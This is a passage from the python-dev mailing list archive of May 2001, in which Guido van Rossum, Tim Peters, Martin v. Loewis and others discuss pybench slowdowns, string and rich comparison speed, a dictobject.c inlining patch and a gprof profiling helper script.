I also looked at SmallLists.  It seems that the only significant
change since 1.5.2 is the garbage collection.  This tests spends a lot
more time deallocating lists than it used to, and the only change I
see in the code is the GC.  I assume, but haven't checked, that the
story is similar for SmallTuples.

So the primary things that have slowed down since 1.5.2 seem to be:
comparisons, coercion, and memory management for containers.  These
also seem to be the things that have improved the most in terms of
features, completeness, etc.  Looks like we need to revisit them and
sort out the performance issues.

Jeremy


From guido@digicool.com  Fri May 18 22:58:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 17:58:25 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT."
 <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>

> The scary thing about BuiltinFunctinoCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and whether their types are.

I would love to see a mechanism whereby the signature of a C function
could be stored as part of the static info about it, in an extension
of the PyMethodDef structure: this would serve as documentation, allow
for introspection, etc.  I'm sure Ping would love this for pydoc and
his inspect module.

But I'm not sure how much we can speed things up, unless we give up on
the tuple interface (an argc/argv API could be much faster since
usually the arguments are already on the frame's stack in this form).

> A few of the other tests, SimpleComplexArithmetic and
> CreateStringsWithConcat, are slower because of the new coercion
> logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
> look at CreateStringsWithConcat in some detail.  The basic problem is
> that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
> PyNumber_Add("ab", "cd").  This function tries all sorts of different
> ways to coerce the strings into addable numbers before giving up and
> trying sequence concat.
> 
> It looks like the new coercion rules have optimized number ops at the
> expense of string ops.  If you're writing programs with lots of
> numbers, you probably think that's peachy.  If you're parsing HTML,
> perhaps you don't :-).
> 
> I looked at the test suite to see how often it is called with
> non-number arguments.  The answer is 77% of the time, but almost all
> of those calls are from test_unicodedata.  If that one test is
> excluded, the majority of the calls (~90%) are with numbers.  But the
> majority of those calls just come from a few tests -- test_pow,
> test_long, test_mutants, test_strftime.
> 
> If I were to do something about the coercions, I would see if there
> was a way to quickly determine that PyNumber_Add() ain't gonna have
> any luck.  Then we could bail to things like string_concat more
> quickly.

There's already a special case for int+int in the BINARY_ADD opcode
(otherwise you would probably see more numbers).  Maybe another
special case for str+str would help here?

> I also looked at SmallLists.  It seems that the only significant
> change since 1.5.2 is the garbage collection.  This tests spends a lot
> more time deallocating lists than it used to, and the only change I
> see in the code is the GC.  I assume, but haven't checked, that the
> story is similar for SmallTuples.
> 
> So the primary things that have slowed down since 1.5.2 seem to be:
> comparisons, coercion, and memory management for containers.  These
> also seem to be the things that have improved the most in terms of
> features, completeness, etc.  Looks like we need to revisit them and
> sort out the performance issues.

Thanks for doing all this work, Jeremy!

I just hope that these performance hacks won't have to be redone when
I'm done with healing the types/class split.  I'm expecting that
things can become a lot simpler if everything inherits from Object,
sequences inherit from Sequence, and so on.  But since I'm currently
going slow on this work, I won't complain too much if the existing
code gets optimized first.  The stuff you already checked in looks
good!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@digicool.com  Fri May 18 23:06:05 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Fri, 18 May 2001 18:06:05 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
References: <200105182107.RAA16214@cliff.concentric.net>
 <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
Message-ID: <15109.40141.757071.770265@slothrop.digicool.com>

In case anyone else is interested, here are two quick pointers on
running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only): 
LDFLAGS="-pg" OPT="-pg" configure
make
When you run python it produces a gmon.out file.  To run gprof, pass
it the profile-enable executable and gmon.out.  It's spit out the
results on stdout.

2. Use this handy script (below) to run a single pybench test under
   the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile('class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name

    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)

    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)

    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])


From jim@interet.com  Sat May 19 17:45:15 2001
From: jim@interet.com (James C. Ahlstrom)
Date: Sat, 19 May 2001 12:45:15 -0400
Subject: [Python-Dev] [off topic] Python is taking over the world
Message-ID: <3B06A31B.67A8D010@interet.com>

I was in my local (Sommerville, NJ) Borders book store
last week and noticed that they stocked many Python books,
most in multiple copies.  It all added up to three feet
of Python books.  Great.

The clincher was when I went to my YMCA, and saw that
someone had posted a flyer offering tutoring in Math,
Physics, Java and Python.

Congratulations to Guido and all on this list.

JimA


From guido@digicool.com  Sun May 20 00:18:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 19 May 2001 19:18:25 -0400
Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish
Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com>

For all you Douglas Adams fans out there:

    Douglas Noel Adams
       1952 - 2001

http://www.douglasadams.com

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sun May 20 10:31:25 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 05:31:25 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>

[M0artin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
> 		c = (*f)(v, w);
> 		if (PyErr_Occurred())

Note that the usual way to write this is

 		if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when
c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
when c < 0 there's no way in the cmp protocol to use c's value alone to
distinguish between "less than" and "error").

> 			return NULL;
> 		return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then
> PyErr_Occurred, finally convert_3way_to_object, which converts
> {-1,0,1} x Op -> {Py_True, Py_False}.

Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

> Indeed, when I inline convert_3way_to_object, I get the same speed in
> both cases (with the remaining differences attributed to measurement
> and gcc doing register usage differently in both functions).

OK, understood, and thanks for following up!

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

In the absence of significant sorting, I agreed Py_EQ is most frequent.

> With a control flow like
>
> 		if (a->ob_size != b->ob_size)
>                    goto False;
>
> 		if (a->ob_size == 0)
>                    goto True;
>
> 		if (a->ob_sval[0] != b->ob_sval[0])
>                    goto False;
>
> 		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>                    goto False;
>                 else
>                    goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

		if (a->ob_size != b->ob_size
                || a->ob_sval[0] != b->ob_sval[0])
                    goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't
include the trailing null byte Python always sticks at the end of string
objects; and the first-byte check is much more likely to pay off than the
zero-length check (comparison to a null string?  gotta be rare as clear
conclusions <wink>), and better to test for the more common case first.


From tim.one@home.com  Sun May 20 10:54:08 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 05:54:08 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>

[Tim]
>> 1. String objects are also equal despite being different objects,
>>    if their ob_sinterned pointers are equal and non-NULL.  So if
>>    you're looking for every trick in & out of the book, that's
>>    another one.

[Martin v. Loewis]
> That does not help. In the entire test suite, there are 0 instances
> where strings are compared which are not identical, but have equal
> ob_sinterned pointers.

Good to know.  Had you tried this a few weeks ago, there would have been
thousands (it so happened that one-character strings weren't being interned
*effectively*, and there were lots of 1-character cases then where #1
applied; that's been fixed; good to know more aren't popping up).

> ...
> Whether there's a fruitless branch depends on your compiler.

A branch instruction is a branch instruction; I didn't distinguish between
taken and non-taken branches, as there's no uniformity in codegen across
platforms.

> With gcc 3, you can write
>
> 	if (__builtin_expect(a == b, 0)) {
>
> and then the body of the if block will be moved out of the way of
> linear control flow.

I don't think we'll be littering Python with compiler-specific hacks.  It's
good to get the less common case out-of-line, but it's not a pure win:  while
it reduces the penalty when the test doesn't pay, it also reduces the benefit
when it does pay (by the wildly architecture-dependent cost of taking a
mispredicted out-of-line branch, and the wildly compiler-dependent costs of
how seriously they take their own decisions or user hints to out-of-line a
block (e.g., the compiler may refetch everything from memory again at the
target if it thinks it's truly rare)).

>> Any idea where those 800,000 virgin calls to oldcomp are coming
>> from?  That's a lot.

> As far as I could trace it, most of them come from lookdict_string (at
> various locations inside this function).

Ah!  Of course.  string_compare is hardwired into lookdict_string.  This case
may be important enough to merit a distinct _PyString_Equal function, with
just the stuff lookdict_string needs (e.g., there's never a gain in testing
for pointer equality when called from lookdict_string because the dict code
already checked that; but there may be a gain for that test in an all-purpose
string_richcompare).

> ...
> So to support sorting better, I should special-case Py_LT in
> string_richcompare also, to avoid the function call ?-)

Of course.  string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE
anway, and that's most of the work for resolving all 6 possibilities.  Get
rid of string_compare entirely!

[on cmp sloth]
> Yes, that is a serious problem. Fortunately, very few calls in my
> programs go to string_compare through cmp() now. But then, your
> programs are different, of course...

There are search-tree modules I have but didn't write that do this; I don't
care enough about them to frustrate Guido's grand vision <wink>>

It may be more important for sequences other than 8-bit strings, as each call
to a comparison function for a pair of non-string sequences is very expensive
(involving more layers of calls for each element comparison).


From tim.one@home.com  Sun May 20 11:13:14 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 06:13:14 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.

If the time machine batteries can hold a full charge, you may want to go back
and add Py_CMP as a seventh possible desired-operation argument to tbe rich
comparison API.  My experience with dict comparisons was that
dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a
full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp
(potentially) compute cmp 3 times to fake one cmp.  But if dict richcmp knew
a cmp outcome was desired, it could compute it with no extra work to speak
of.  Then there would be no reason at all to hold on to the dict tp_compare
slot.

The list and tuple richcmps are also doing almost all the work needed to
compute a 3-way cmp outcome.


From tim.one@home.com  Sun May 20 12:05:53 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 07:05:53 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B037D27.E258C363@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> Running the same test for 2.1 vs. 2.0 there's not much to
> notice, so the important changes seem to be originating in
> the move from 1.5.2 to 2.0.

IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
1.5.2, and Fredrik did more independently (like inlining high-frequency int
operations in the eval loop).  Also IIRC, that's the last time any concerted
effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
unstable equilibrium never endures without deliberate and persistent
rebalancing work.  If Python were "a real product", it would be at least one
person's full-time job to keep it in peak shape.  But it's not even a
part-time job for anyone, and I don't see that changing.  In compensation,
machines have gotten faster much quicker than Python has slowed.


From mal@lemburg.com  Sun May 20 12:50:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 13:50:17 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>
Message-ID: <3B07AF79.6EB42E54@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > Running the same test for 2.1 vs. 2.0 there's not much to
> > notice, so the important changes seem to be originating in
> > the move from 1.5.2 to 2.0.
> 
> IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
> 1.5.2, and Fredrik did more independently (like inlining high-frequency int
> operations in the eval loop).  Also IIRC, that's the last time any concerted
> effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
> unstable equilibrium never endures without deliberate and persistent
> rebalancing work.  If Python were "a real product", it would be at least one
> person's full-time job to keep it in peak shape.  But it's not even a
> part-time job for anyone, and I don't see that changing.  In compensation,
> machines have gotten faster much quicker than Python has slowed.

How about making performance the main "feature" for 2.3 then ?!

2.0 - 2.2 introduced many new features in the interpreter core,
so I think it's time to stabilize those features and focus on
making Python regain the performance it had before those features
were introduced. At least to some of us, performance is an
issue and I think that there's a lot we can do to improve it.

One way to open up the field for better performance will be
to modularize the interpreter, so that new ways of optimization
can be explored, e.g. truning the VM a register machine 
(Skip once started looking into this with his Rattlesnake
patches) or creating specialized VMs which can then be used
by optimizing compilers as targets.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh@python.net  Sun May 20 12:52:40 2001
From: mwh@python.net (Michael Hudson)
Date: 20 May 2001 12:52:40 +0100
Subject: [Python-Dev] Comparison speed
In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400"
References: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>
Message-ID: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>

"Tim Peters" <tim.one@home.com> writes:

> Ah!  Of course.  string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct
> _PyString_Equal function, with just the stuff lookdict_string needs

Or just inlining it all into lookdict_string, something like:

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.90
diff -c -r2.90 dictobject.c
*** Objects/dictobject.c	2001/05/19 07:04:38	2.90
--- Objects/dictobject.c	2001/05/20 11:51:28
***************
*** 279,286 ****
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
- 	cmpfunc compare = PyString_Type.tp_compare;
  
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
--- 279,287 ----
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
  
+ #define S(s) ((PyStringObject*)(s))
+ 
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
***************
*** 299,305 ****
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && compare(ep->me_key, key) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
--- 300,308 ----
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && S(ep->me_key)->ob_size == S(key)->ob_size
! 		    && memcmp(S(ep->me_key)->ob_sval,
! 			      S(key)->ob_sval,S(key)->ob_size) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
***************
*** 318,324 ****
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& compare(ep->me_key, key) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
--- 321,329 ----
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& S(ep->me_key)->ob_size == S(key)->ob_size
! 			&& memcmp(S(ep->me_key)->ob_sval,
! 				  S(key)->ob_sval,S(key)->ob_size) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
***************
*** 327,332 ****
--- 332,339 ----
  		if (incr > mask)
  			incr ^= mp->ma_poly; /* clears the highest bit */
  	}
+ 
+ #undef S
  }
  
  /*

(apologies for the use of the preprocessor...).  I'll leave it to
someone else to work out if this is a win or not...

-- 
                    >> REVIEW OF THE YEAR, 2000 <<
                   It was shit. Give us another one.
                          -- NTK Know, 2000-12-29, http://www.ntk.net/


From tim.one@home.com  Sun May 20 13:57:11 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 08:57:11 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B07AF79.6EB42E54@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>

[MAL]
> How about making performance the main "feature" for 2.3 then ?!

Guido may be a dictator, but he doesn't have a magic wand -- "the main
feature" is what people volunteer to do and then fight for and then actually
do.

> 2.0 - 2.2 introduced many new features in the interpreter core,
> so I think it's time to stabilize those features and focus on
> making Python regain the performance it had before those features
> were introduced.  At least to some of us, performance is an
> issue and I think that there's a lot we can do to improve it.

"Performance" is meaningless unless quantified and made concrete:  what is it
that runs too slowly?  "Everything" is not a useful answer.  Speeding up
line-at-a-time input was an example of something that worked, via focus and
measurement and pushing ahead despite opposition.  I doubt any other approach
will bear fruit over such a short timeframe, and especially not without
resources to throw at it.

> One way to open up the field for better performance will be
> to modularize the interpreter, so that new ways of optimization
> can be explored, e.g. truning the VM a register machine
> (Skip once started looking into this with his Rattlesnake
> patches) or creating specialized VMs which can then be used
> by optimizing compilers as targets.

Restructure the core for the benefit of optimizing compilers that don't
exist?  That sounds like an interesting research project, but not much to do
with making 2.3 faster.  In the meantime, modularization is more likely to
make the VM that does exist slower.

could-be-it's-easy-answers-or-none-ly y'rs  - tim


From tim.one@home.com  Sun May 20 13:58:09 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 08:58:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKDAA.tim.one@home.com>

[Michael Hudson]
> ...
> (apologies for the use of the preprocessor...).  I'll leave it to
> someone else to work out if this is a win or not...

Umm, but that's the *hard* part.  I think even Guido knows how to do a string
compare inline <wink>.


From tim.one@home.com  Sun May 20 14:09:50 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 09:09:50 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFKKDAA.tim.one@home.com>

[Jeremy Hylton]
> ...
> The scary thing about BuiltinFunctinoCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and whether their types are.

Special-casing the snot out of "O" looks like a winner <wink>:

  count     format %total  cumulative%
-------   -------- ------  -----------
1440897        'O'  47.45  47.45
 327694       'O!'  10.79  58.24
 285570      'O|i'   9.40  67.65
 262168     'O!|O'   8.63  76.28
 227405        'l'   7.49  83.77
 146537       's#'   4.83  88.60
  76779     'OO|O'   2.53  91.12
  65682      '|ss'   2.16  93.29
  48033       'OO'   1.58  94.87
  39879   'O|O&O&'   1.31  96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test
suite, after stripping ";" and ":" decorations.

fast-paths-on-the-overtired-brain-ly y'rs  - tim


From aahz@rahul.net  Sun May 20 14:50:08 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Sun, 20 May 2001 06:50:08 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> from "Tim Peters" at May 20, 2001 06:13:14 AM
Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> If the time machine batteries can hold a full charge, you may want
> to go back and add Py_CMP as a seventh possible desired-operation
> argument to tbe rich comparison API.  My experience with dict
> comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE
> any cheaper than by doing a full cmp, so I put the dict oldcmp back in
> order to avoid having dict richcmp (potentially) compute cmp 3 times
> to fake one cmp.  But if dict richcmp knew a cmp outcome was desired,
> it could compute it with no extra work to speak of.  Then there would
> be no reason at all to hold on to the dict tp_compare slot.
>
> The list and tuple richcmps are also doing almost all the work needed
> to compute a 3-way cmp outcome.

+1 from me; there's one spot in my new Decimal.py where I optimize an
expensive pair of equality tests down to one by using cmp(), and it's
likely that similar cases will pop up.  When I convert to C code, I'll
want to keep doing that.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From martin@loewis.home.cs.tu-berlin.de  Sun May 20 14:48:43 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 20 May 2001 15:48:43 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>

> string_compare() could special-case pointer equality too, although I suspect
> doing so would be a net loss.

I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without
identity test takes 0.74s, running it with identity test takes 0.68s.

Now, looking at the case of non-identical pointers, I could not find
any measurable difference. After increasing the number of rounds by a
factor of ten, I got, without identity test

6.920
6.920
6.910
6.970
7.080
6.920
6.920
6.910
6.930
6.920

With identity test, I got

6.930
6.930
6.920
7.080
6.920
6.930
6.960
6.930
6.920
6.920

That still does not look like a significant difference to me.

Regards,
Martin


From guido@digicool.com  Sun May 20 14:56:54 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 20 May 2001 09:56:54 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT."
 <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>
Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>

> If the time machine batteries can hold a full charge, you may want to go back
> and add Py_CMP as a seventh possible desired-operation argument to tbe rich
> comparison API.

Funny, I was thinking about this too last night.

> My experience with dict comparisons was that dict_richcompare
> couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full
> cmp, so I put the dict oldcmp back in order to avoid having dict
> richcmp (potentially) compute cmp 3 times to fake one cmp.  But if
> dict richcmp knew a cmp outcome was desired, it could compute it
> with no extra work to speak of.  Then there would be no reason at
> all to hold on to the dict tp_compare slot.

I'm not sure I see the saving.  There's no real saving in time,
because you still have to make separate calls for EQ and CMP, right?

There might be a saving in code, but you could solve that internally
in dictobject.c by restructuring the code somewhat so that
dict_compare shared more with dict_richcompare, right?

It's mostly an API streamlining.  The other difference between
tp_compare and tp_richcompare is that the latter returns an object
which makes testing for errors unambiguous.

But (for several releases) we would still have to support tp_compare
for b/w compatibility with old 3r party extensions.

> The list and tuple richcmps are also doing almost all the work needed to
> compute a 3-way cmp outcome.

Ditto.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Sun May 20 17:19:29 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 18:19:29 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>
Message-ID: <3B07EE91.5747F4F4@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > How about making performance the main "feature" for 2.3 then ?!
> 
> Guido may be a dictator, but he doesn't have a magic wand -- "the main
> feature" is what people volunteer to do and then fight for and then actually
> do.

I will certainly go back to the basics and redo my optimization
patches for Python later this year. Whether or not these will
get included in the core is another story, but I have a need for
a fast interpreter for my app. server and can't afford losing
too much performance when moving from 1.5.x to 2.x.
 
> > 2.0 - 2.2 introduced many new features in the interpreter core,
> > so I think it's time to stabilize those features and focus on
> > making Python regain the performance it had before those features
> > were introduced.  At least to some of us, performance is an
> > issue and I think that there's a lot we can do to improve it.
> 
> "Performance" is meaningless unless quantified and made concrete:  what is it
> that runs too slowly?  "Everything" is not a useful answer.  Speeding up
> line-at-a-time input was an example of something that worked, via focus and
> measurement and pushing ahead despite opposition.  I doubt any other approach
> will bear fruit over such a short timeframe, and especially not without
> resources to throw at it.

Let's put it this way: if pystone gets a 50% boost, then all
applications should benefit from it regardeless whether they
are function call intense or fiddle with a lot of attributes.
Achieving those 50% will be a lot harder than for the 1.5
series, though ;-)
 
> > One way to open up the field for better performance will be
> > to modularize the interpreter, so that new ways of optimization
> > can be explored, e.g. truning the VM a register machine
> > (Skip once started looking into this with his Rattlesnake
> > patches) or creating specialized VMs which can then be used
> > by optimizing compilers as targets.
> 
> Restructure the core for the benefit of optimizing compilers that don't
> exist?  That sounds like an interesting research project, but not much to do
> with making 2.3 faster.  In the meantime, modularization is more likely to
> make the VM that does exist slower.

Depends on how you look at it: extension writers will then
have the possibility of plugging in new compilers and VMs
into Python to experiment with new optimization strategies.

The Rattlesnake project is one such project which would do
great with this plugin logic since it uses special opcodes
which an optimizer generates and then needs a modified VM
to execute these new byte code streams...

from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but at least provide
better means for experiments in that direction.
Alternative VM implementations like Stackless Python would 
also benefit from it.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Sun May 20 22:13:04 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 17:13:04 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>

[Martin v. Loewis, on pointer-equality tests in string_compare()]

> I've done some measurements here, too, again taking your example
> ...
>     for i in indices:
>         "ab" < "ab"
> ...
> This is the case where testing for identity helps. Running it without
> identity test takes 0.74s, running it with identity test takes 0.68s.

This stuff all ties together.  A pointer-equality test in string_compare() is
guaranteed to lose every time string_compare() gets called from
lookdict_string().  Let's lose string_compare() entirely (in favor of a
self-contained-- apart from memcmp() --string_richcompare).


From tim.one@home.com  Sun May 20 22:37:09 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 20 May 2001 17:37:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGIKDAA.tim.one@home.com>

[Tim, muses about a Py_CMP value for rich comparisons, and talks
 mostly about dict comps]

> ...
> I'm not sure I see the saving.  There's no real saving in time,
> because you still have to make separate calls for EQ and CMP, right?

Right so far as it goes.  A "fast path" (which currently doesn't exist but is
clearly worth adding, based on both my and Martin's timings) for doing *all*
kinds of same-type comparisons would only have to look for a richcompare
slot, though, not one kind of slot in some cases and another in others.
Uniformity is contagious <wink>.

> There might be a saving in code, but you could solve that internally
> in dictobject.c by restructuring the code somewhat so that
> dict_compare shared more with dict_richcompare, right?

Right, there would be no reduction in total code, and the dict routines
already share as much as possible.  In effect, the body of dict_compare would
replace the last

		res = Py_NotImplemented;

line in the (currently tiny) dict_richcompare guarded by the appropriate
tests.

> It's mostly an API streamlining.

Bingo, and the possibility of retiring the tp_compare slot in P3K.

> The other difference between tp_compare and tp_richcompare is that
> the latter returns an object which makes testing for errors unambiguous.

Also cool.

> But (for several releases) we would still have to support tp_compare
> for b/w compatibility with old 3r party extensions.

Sure, although the way the CVS branch code is going it could be that 2.2 is
the long-awaited utterly incompatible P3K anyway <wink>.

>> The list and tuple richcmps are also doing almost all the work needed
>> to compute a 3-way cmp outcome.

> Ditto.

Oh no!  Those aren't like dict compares.  A rich compare for sequence types
(whether strings or lists) *has* to contain almost all the code necessary to
implement cmp(), because just resolving Py_EQ in all cases has to find "the
first" element (if any) that differs.  Once that's known, you're at most one
